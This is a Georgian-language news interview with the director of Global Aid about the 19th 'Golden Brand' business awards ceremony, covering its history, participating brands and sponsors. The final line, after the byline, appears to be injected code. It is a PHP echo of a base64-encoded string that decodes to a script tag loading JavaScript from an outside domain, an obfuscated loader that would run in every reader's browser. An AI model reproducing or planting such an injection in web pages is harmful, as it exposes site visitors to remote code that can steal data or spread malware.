celsiusi
ავერსი საქკაბელი

 კომპანია “გლობალ აიდი” წელს “ოქროს ბრენდის” დაჯილდოვების 19-ე ცერემონიალს ატარებს. “ოქროს ბრენდის” ცერემონიალი, რომელიც საქართველოში  2005 წლიდან ყოველ წელიწადს ტარდება, წელს 14 ივნისს გაიმართება.  დაჯილდოვების შესახებ და ცერემონიის დეტალებზე  მეტი ინფორმაციიის გასარკვევად საინფორმაციო სააგენტო „ბიზნესთაიმი“  კომპანია “გლობალ აიდის” დირექტორს ნათია ჯინჭარაძეს ესაუბრა. 

 
როგორია წლევანდელი დაჯილდოვების მიმართ ბიზნესის ჩართულობა?
ბიზნესის ჩართულობა წელსაც საკმაოდ მაღალია. მოგეხსენებათ, პირველი დაჯილდოების ცერემონიალი შორეულ 2005 წელს გავმართეთ და სულ 22 ბრენდი დავაჯილდოვეთ. დღეს კი, ბიზნესის სხვადასხვა სფეროში 60-მდე ბრენდს ვაჯილდოვებთ. რაც, ნათელი მაგალითია იმისა, რომ არათუ შევინარჩუნეთ ნდობა ბიზნესის თვალში, არამედ პირიქით უფრო მეტი ნდობა დავიმსახურეთ.
 
წინა წლებს რომ შეადაროთ, რითი იქნება განსხვავებული წლევანდელი „გოლდენ ბრენდის“ დაჯილდოვება?
ვცდილობთ თვითონ დაჯილდოების ცერემონიალი ყოველწლიურად უფრო მრავალფეროვანი გავხადოთ, რათა დამსწრეთათვის და განსაკუთრებით გამარჯვებულთათვის იყოს საზეიმო და სასიამოვნო საღამო, შეიგრძნონ, რომ წლის განმავლობაში გაწეულ უდიდეს შრომის შედეგს, სწორედ ამ დღეს იმკიან.
 
რამდენი კომპანია მონაწილეობს წელს დაგეგმილ ღონისძიებაში?
როგორც უკვე აღვნიშნე, ბიზნესის ჩართულობა საკმაოდ მაღალია. წლევანდელ ღონისძიებაზე ბიზნესის სხვადასხვა სფეროდან 57 ბრენდი დაჯილდოვდება. მოგეხსენებათ, ერთ გარკვეულ სეგმენტში მხოლოდ ერთი ბრენდს გადაეცემა ოქროს ბრენდი, შესაბამისად ეს საკმაოდ მაღალი რიცხვია.
 
რამდენად აცნობიერებს ბიზნესი მსგავსი ღონისძიებების მნიშვნელობას?
ბიზნესი სრულად აღიქვამს ამგვარი ღონისძიების მნიშვნელობას, რადგან, ეს არ არის მხოლოდ ერთჯერადი აღიარება. ეს არის კომპანიის იმიჯის ერთერთი ყველაზე მნიშვნელოვანი შემადგენელი ნაწილი. კომპანიის პორტ ფოლიოში გამარჯვებულის სერთიფიკატები ამ კომპანიის მაღალი იმიჯის მაჩვენებელია. ბიზნესისთვის ოქროს ბრენდი არის გარკვეულ წილად, წინა წლის შრომის შეჯამება და რაც მთავარია დაფასება, იმ შრომისა, რომელიც მათ გასწიეს.
ამასთანავე კომპანიისთვის ძალიან დიდი სტიმულია იცოდეს, რომ მათი შრომა დაფასდა. მათი ბრენდი წლის ბოლოს აღიარეს საუკეთესოდ ბიზნესის ამა თუ იმ სფეროში. საპირისპიროდ კი კონკურენტ ბრენდებს უჩნდებათ სურვილი მომავალ წელს ისინი გახდნენ ლიდერები. შესაბამისად, ამ პროექტს შესწევს ძალა კომპანიებში გააჩინოს შეჯიბრობითობა, რაც სასიკეთოდ აისახება პროდუქტის საბოლოო ხარისხსა და პოპულარობაში. შესაბამისად ქართველი მომხმარებელი იღებს უკეთეს პროდუქტს და მომსახურებას.
 
სულ რამდენი ნომინაცია იქნება წარმოდგენილი და წელს ხომ არ დაემატა ახალი ნომინაცია?
როგორც აღვნიშნე წელს 57 ბრენდი დაჯილდოვდება. ზოგიერთი ნომინაცია ამოვიღეთ, ბევრი ახალიც ჩავამატეთ. ეს ჩვენი შიდა პოლიტიკის ნაწილია, გვსურს ყოველ წელს განსხვავებული ნომინაციები წარვადგინოთ და მაქსიმალურად მოვიცვათ ყველა სფერო.
 
როგორ ფიქრობთ, რას ნიშნავს „გოლდენ ბრენდის“ დაჯილდოვების ღონისძიებაში ჩართულობა ბიზნესისთვის და როგორია ბიზნესის დამოკიდებულება?
ჩვენს სავაჭრო ნიშნებს ბიზნესის უამრავ პროდუქტზე შეამჩნევთ. რაც არის ერთგვარი გარანტი, რომ ეს პროდუქცია თუ სერვისი უმაღლესი ხარისხისაა. კომპანიებს ის გამოყენებული აქვთ სარეკლამო ბანერებზე თუ სატელევიზიო რეკლამებში. ჩვენი მოქალაქეებისთვისაც, ანალოგიურად ოქროს ბრენდის ნიშანი ნდობას იწვევს და მეტად ენდობა ამ პროდუქციას.
 
ჩვენ ვამაყობთ, რომ ჩვენი სავაჭრო ნიშანი ამდენად მნიშვნელოვანი გახდა ქართულ ყოველდღიურობაში. სხვათა შორის ორმაგად ამაყი ვარ იმით რომ არამარტო საქართველოში, "ოქროს ბრენდის" სავაჭრო ნიშანს უკვე რამდენიმე ქვეყანაშიც იყენებენ. საერთაშორისო კომპანიების პროდუქციის რეკლამა რამდენიმე ევროპულ და აზიურ წამყვან სატელევიზიო ეთერში გადის წარწერით „ნომერი პირველი ოქროს ბრენდი საქართველოში“ ეს ყველაფერი კი მაძლევს საშუალებას, თავისუფლად ვთქვა, რომ ბიზნესის დამოკიდებულება არის მხოლოდ და მხოლოდ დადებითი.
 
ბოლო წლების გათვალისწინებით, ბიზნესის დამოკიდებულება მსგავს ღონისძიებებში მონაწილეობის, როგორ შეიცვალა, დამოკიდებულება ალბათ, წლებთან ერთადაც იცვლებოდა, არა?
ქართული ბიზნესი, რომელიც დამოუკიდებლობის გამოცხადების შემდეგ ჩაისახა, სულ რაღაც 34 წლისაა, შესაბამისად შეიძლება ითქვას, ყველა სიახლე ამ წლებში ნელ-ნელა შევიდა ბიზნესის წარმოების კულტურაში. შეგახსენებთ პირველი დაჯილდოების ცერემონიის მონაწილე 22 ბრენდი იყო, მას შემდეგ კი ათასამდე ბრენდი გვყავს დაჯილდოებული.
 
 
ვინ არიან ღონისძიების მხარდამჭერები?
საერთაშორისო სავაჭრო პალატა, მეწარმე ქალთა საბჭო საქართველოში, საერთაშორისო გამოცემები: American Stock News (ამერიქან სტოკ ნიუსს); The Washington Inquirer , (ზე ვაშინგტონ ინქუაიერ) -ს; The Dallas Observer (ზე დალას ობსერვერ) - ს; რადიო მაესტრო -FM 94, 7; რადიო ვინილი -FM 99, 7; რადიო M-შვიდი - FM 93, 1; რადიო კომერსანტი -FM 95, 5; პუბლიკა.ჯი; საინფორმაციო სააგენტო BUSINESS TIME (www.businesstime.ge) და ჟურნალ გლოსი;
 
 
რა სიურპრიზს სთავაზობთ წლევანდელ მონაწილეებს?
მე-19 წელია ვატარებთ "ოქროს ბრენდის" დაჯილდოებას და ალბათ დამემოწმებით ყოველწლიურად უფრო დახვეწილი და მასშტაბურია. ჩვენ არ გვსურს დაჯილდოება მხოლოდ მშრალი სტატისტიკით შემოიფარგლოს, ამიტომ ღონისძიება ამჯერადაც დახუნძლული იქნება მრავალფეროვნებით, შოუს ელემენტებით, მუსიკალური ნომრებით და რაც მთავარია, ოფიციალური ნაწილის დასრულების შემდეგ ყველა სტუმარს ექნება შესაძლებლობა მოიპოვოს ინდივიდუალური ჯილდო, რადგან მოხდება უამრავი პრიზის გათამაშება.
 
 
და ბოლოს, როგორ აფასებთ საინფორმაციო სააგენტო „ბიზნეს თაიმთან“ პარტნიორობას და რა პერსპექტივები აქვს ამ პარტნიორობას?
ჩვენთვის ძალიან მნიშვნელოვანია თქვენს სააგენტოსთან პარტნიორობა, რადგან თქვენ, როგორც ჩვენ ემსახურებით იმ სფეროს, რომელიც უმთავრესია ქვეყნის განვითარებაში - ბიზნესს. უნდა აღვნიშნო, რომ ფრიად მოხარულები ვართ, რომ "ბიზნესთაიმთან" ურთიერთობა ტრადიციული გახდა და იმედი მაქვს ეს ასეც გაგრძელდება წლების მანძილზე.
 
ავტორი
მირანდა შურღაია
689
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");